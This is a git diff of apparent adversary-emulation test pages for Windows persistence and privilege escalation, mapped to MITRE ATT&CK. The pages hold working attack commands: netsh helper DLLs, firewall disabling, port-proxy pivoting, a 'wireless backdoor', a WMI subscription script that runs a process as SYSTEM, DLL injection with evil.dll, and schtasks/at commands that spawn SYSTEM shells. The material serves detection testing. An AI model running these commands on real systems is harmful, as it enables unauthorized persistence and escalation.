b/Windows/Persistence/Change_Default_File_Association.md @@ -0,0 +1,13 @@ +# Change Default File Association + +MITRE ATT&CK Technique: [T1042](https://attack.mitre.org/wiki/Technique/T1042) + +## User file association preferences are stored under + + [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts + +Changes to a user's preference will occur under this entry's subkeys. + +## Change association with assoc.exe + + cmd.exe assoc .wav="C:\Program Files\Windows Media Player\wmplayer.exe" diff --git a/Windows/Persistence/Component_Object_Model_Hijacking.md b/Windows/Persistence/Component_Object_Model_Hijacking.md new file mode 100644 index 00000000..7bfef287 --- /dev/null +++ b/Windows/Persistence/Component_Object_Model_Hijacking.md @@ -0,0 +1,17 @@ +# Component Object Model Hijacking + +MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122) + +## The search order for locating COM Objects can be hijacked, causing unauthorized code to execute. + +#### The presence of objects within + + HKEY_CURRENT_USER\Software\Classes\CLSID\ + +#### May be anomalous and should be investigated since user objects will be loaded prior to machine objects in + + HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\ + +## Test Script + +[COM Hijack Scripts](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/COMHijackScripts) diff --git a/Windows/Persistence/Netsh_Helper_DLL.md b/Windows/Persistence/Netsh_Helper_DLL.md new file mode 100644 index 00000000..a60a1927 --- /dev/null +++ b/Windows/Persistence/Netsh_Helper_DLL.md @@ -0,0 +1,53 @@ +# Netsh Helper DLL + +MITRE ATT&CK Technique: [T1128](https://attack.mitre.org/wiki/Technique/T1128) + +## A DLL can be registered to be loaded each time netsh.exe is executed, or for certain events. + +Netsh interacts with other operating system components using dynamic-link library (DLL) files. Each Netsh helper DLL provides an extensive set of features called a context, which is a group of commands specific to a networking component. For example, Dhcpmon.dll provides netsh the context and set of commands necessary to configure and manage DHCP servers. + +## Attackers can register a netsh helper with this command + + netsh.exe add helper C:\Path\file.dll + +## The following registry key stores the paths to the helpers + + HKLM\SOFTWARE\Microsoft\Netsh + +## Additional Netsh.exe testing we recommend + +### Firewall Control + +Input: + + netsh firewall set opmode [disable|enable] + +### Netsh.exe Pivoting + +Input: + + netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 + +Can also support v4tov6, v6tov6, and v6tov4 + +### Netsh.exe Sniffing + +Input: + + netsh trace start capture=yes overwrite=no tracefile= + +to stop: + + netsh trace stop + +### Netsh.exe Wireless backdoor + +Input: + + netsh wlan set hostednetwork mode=[allow\|disallow] + netsh wlan set hostednetwork ssid= key= keyUsage=persistent\|temporary + netsh wlan [start|stop] hostednetwork + +Enables or disables hostednetwork service. +Complete hosted network setup for creating a wireless backdoor. +Starts or stops a wireless backdoor. See below to set it up. diff --git a/Windows/Persistence/Scheduled_Task.md b/Windows/Persistence/Scheduled_Task.md new file mode 100644 index 00000000..80e125c5 --- /dev/null +++ b/Windows/Persistence/Scheduled_Task.md @@ -0,0 +1,9 @@ +## Scheduled Task + +MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053) + +### Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time + +[Examples Of Creating Tasks](https://technet.microsoft.com/en-us/library/cc725744(v=ws.11).aspx#BKMK_create) + + diff --git a/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md b/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md new file mode 100644 index 00000000..98471a9e --- /dev/null +++ b/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md @@ -0,0 +1,53 @@ +## Windows Management Instrumentation Event Subscription + +MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084) + +### Persistence + +Example: +```powershell +#Run from an administrator powershell window +#Code references +#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af +#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + +$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; +$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs + +$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} +$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs + +$FilterToConsumerArgs = @{ +Filter = [Ref] $Filter +Consumer = [Ref] $Consumer +} +$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs +``` + +After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. + + +Cleanup: +```powershell +#Run from an administrator powershell window +#Code references +#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af +#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + +$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" +$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" +$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" + +$FilterConsumerBindingToCleanup | Remove-WmiObject +$EventConsumerToCleanup | Remove-WmiObject +$EventFilterToCleanup | Remove-WmiObject +``` + +#### References + +https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af +https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 \ No newline at end of file diff --git a/Windows/Privilege Escalation/Bypass_User_Account_Control.md b/Windows/Privilege Escalation/Bypass_User_Account_Control.md new file mode 100644 index 00000000..cfefd4e9 --- /dev/null +++ b/Windows/Privilege Escalation/Bypass_User_Account_Control.md @@ -0,0 +1,10 @@ +# Bypass User Account Control + +MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122) + +There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. + +## Test Script + +[UACBypass](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/UACBypass) + diff --git a/Windows/Privilege Escalation/DLL Injection.md b/Windows/Privilege Escalation/DLL Injection.md new file mode 100644 index 00000000..3334569d --- /dev/null +++ b/Windows/Privilege Escalation/DLL Injection.md @@ -0,0 +1,17 @@ +## DLL Injection + +MITRE ATT&CK Technique: [T1055](https://attack.mitre.org/wiki/Technique/T1055) + +Examples and code resource for [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution) + +### PowerShell Invoke-ReflectivePEInjection + +Input: + + C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-ReflectivePEInjection.ps1 + +### Powershell Invoke-DllInjection + +Input: + + C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll diff --git a/Windows/Privilege Escalation/Scheduled Task.md b/Windows/Privilege Escalation/Scheduled Task.md new file mode 100644 index 00000000..11b25dfb --- /dev/null +++ b/Windows/Privilege Escalation/Scheduled Task.md @@ -0,0 +1,34 @@ +## Scheduled Task + +MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053) + + +## at.exe + +Note: deprecated in Windows 8+ + +### Privileged Escalation + +This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system. + +Input: + + at 13:20 /interactive cmd + +Example: + + net use \\[computername|IP] /user:DOMAIN\username password + net time \\[computername|IP] + at \\[computername|IP] 13:20 c:\temp\evil.bat + +## schtask.exe + +### Launch Interactive cmd.exe + +Input: + + SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 + +Input: + + schtasks /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System" diff --git a/Windows/Windows.md b/Windows/Windows.md new file mode 100644 index 00000000..da536197 --- /dev/null +++ b/Windows/Windows.md @@ -0,0 +1,40 @@ +## MITRE ATT&CK Matrix - Windows + +| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | +|-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| +| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | Clipboard Data | Data Encrypted | Connection Proxy | +| Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | +| Bootkit | Bypass User Account Control | Component Firmware | Credentials in Files | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| [Change Default File Association](Persistence/Change_Default_file_association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Component Object Model Hijacking | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | +| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Input Capture | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | +| Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels | +| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query%20Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels | +| External Remote Services | Local Port Monitor | Deobfuscate/Decode Files or Information | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote%20System%20Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication | +| File System Permissions Weakness | New Service | Disabling Security Tools | | Security Software Discovery | Taint Shared Content | Rundll32 | Video Capture | | Multilayer Encryption | +| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System%20Information%20Discovery.md) | Third-party Software | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | | | Remote File Copy | +| Hypervisor | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | [File Deletion](Defense%20Evasion/File_deletion.md) | | System Network Configuration Discovery | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol | +| Local Port Monitor | Service Registry Permissions Weakness | File System Logical Offsets | | System Network Connections Discovery | Windows Remote Management | Service Execution | | | Standard Cryptographic Protocol | +| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System%20Owner-User%20Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol | +| Modify Existing Service | Web Shell | Indicator Blocking | | System Service Discovery | | Trusted Developer Utilities | | | Uncommonly Used Port | +| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Indicator Removal from Tools | | System Time Discovery | | [Windows Management Instrumentation](Execution/Windows%20Management%20Instrumentation.md) | | | Web Service | +| New Service | | [Indicator Removal on Host](Defense%20Evasion/Indicator%20Removal%20on%20Host.md) | | | | [Windows Remote Management](Lateral%20Movement/Windows%20Remote%20Management.md) | | | | +| Office Application Startup | | Install Root Certificate | | | | [Bitsadmin](Execution/Bitsadmin.md) | | | | +| Path Interception | | [InstallUtil](Execution/RegsvcsRegasm.md) | | | | | | | | +| Redundant Access | | Masquerading | | | | | | | | +| Registry Run Keys / Start Folder | | Modify Registry | | | | | | | | +| Scheduled Task | | NTFS Extended Attributes | | | | | | | | +| Security Support Provider | | Network Share Connection Removal | | | | | | | | +| Service Registry Permissions Weakness | | Obfuscated Files or Information | | | | | | | | +| Shortcut Modification | | Process Hollowing | | | | | | | | +| System Firmware | | Redundant Access | | | | | | | | +| Valid Accounts | | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | | | | | | | | +| Web Shell | | [Regsvr32](Execution/Regsvr32.md) | | | | | | | | +| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Rootkit | | | | | | | | +| Winlogon Helper DLL | | Rundll32 | | | | | | | | +| | | Scripting | | | | | | | | +| | | Software Packing | | | | | | | | +| | | Timestomp | | | | | | | | +| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | | +| | | Valid Accounts | | | | | | | |